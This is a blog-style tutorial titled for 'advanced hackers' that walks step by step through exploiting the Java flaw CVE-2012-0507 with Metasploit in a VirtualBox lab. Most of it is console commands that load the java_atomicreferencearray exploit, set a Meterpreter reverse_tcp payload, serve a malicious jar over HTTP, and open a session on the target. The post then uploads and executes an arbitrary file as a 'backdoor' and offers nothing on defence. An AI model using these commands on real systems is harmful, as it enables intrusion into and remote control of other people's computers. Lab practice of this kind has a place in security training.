Metasploit by exploiting Java vulnerability
CVE-2012-0507 (For advanced hackers)
On this post (from BreakTheSecurity) i am
going to demonstrate how to use the
Metasploit tool to exploit the popular java
AtomicReferenceArray Type Violation
vulnerability(CVE-2012-0507).
Requirements:
VirtualBox
Target OS(windows,...)
PenTesting Distro(Backtrack )
JRE 6(unpatched version)
I am assuming you already know how to set
up virtual machines and how to install
backtrack etc
Part I: Preparing the Target Machine:
Start the "Target" Machine.
Install the JRE 6.
Part II: Preparing the PenTesting Machine:
Now, start the BT5.
Open the Terminal and Type "msfupdate".
This will update the Metasploit Framework
(MSF) with the latest exploits and Payloads. As
CVE-2012-0507 is latest vulnerability, you have
to update the MSF before proceeding further.
Part III :
Exploiting the Java AtomicReferenceArray
Type Violation Vulnerability:
Step 1:
Open the Terminal and type "msfconsole".
This will bring the Metasploit console , here
you can interact with the MSF.
Step 2:
Type "use exploit/multi/browser/
java_atomicreferencearray" . This command
will use the java_atomicreferencearray.rb
module for the attack.
Now type "show options" to display the
which settings are available and/or required
for this specific module.
Then type "set SRVPORT 80".
and "set URIPATH /".
Step 3: Set Payload
Type "show payloads", this will displays the
list of payloads. We are going to use the
'reverse_tcp' payload. This payload will get
reverse tcp connection from the Target to
PenTesting machine.
Type 'set payload java/meterpreter/
reverse_tcp' in the console.
set LHOST [IP_address] : In order to get
reverse connection, we have to set our IP in
the LHOST.
open the Terminal and type "ifconfig". This
will display the IP info of our PenTesting
Machine. The IP will be "192.168.56.x". E.g, let
me say the ip is 192.168.56.10.
Now Type in the msfconsole as "set LHOST
192.168.56.10".
Part IV: Breaching the Target Machine:
So , are you ready?! Let us break into the
Target Machine.
Step 1:
Type "exploit" in the msfconsole. This will
start the reverse handler to our Machine and
it will wait anyone that will connect to the our
HTTP server (Eg: http://192.168.56.10/). Once
victim connect to our server, it will send a jar
will that will exploit the CVE-2012-0507
vulnerability.
step 2:
Open the Firefox/IE in the Target machine.
Enter " http://192.168.56.10/".
It loads nothing but exploit will run in the
background.
Step 3:
Open the BT5 machine,
Now type "sessions", this will show the list of
active sessions .
Type "sessions -i 1", this will open the
connection to the session with the id '1' and
bring you to Meterpreter. Meterpreter will
help you to interact/control with the Target.
Step 4:Upload files
We got backdoor to the Target machine :) ,
now we can run any commands in the Target.
For Example, Typing 'sysinfo' will display the
system information.
You can also upload and execute your own
executable files in the Target machine.
'upload /Test.exe c:\\", this command will
upload the Test.exe from the root('file system'
dir) folder of the BT5 to the C drive of the
Target.
'execute -f C:\\Test.exe", this command will
run our uploaded File in the Target.
There you have it.. Now you are in the remote
computer and you can do pretty much
anything :)
No comments:
Post a Comment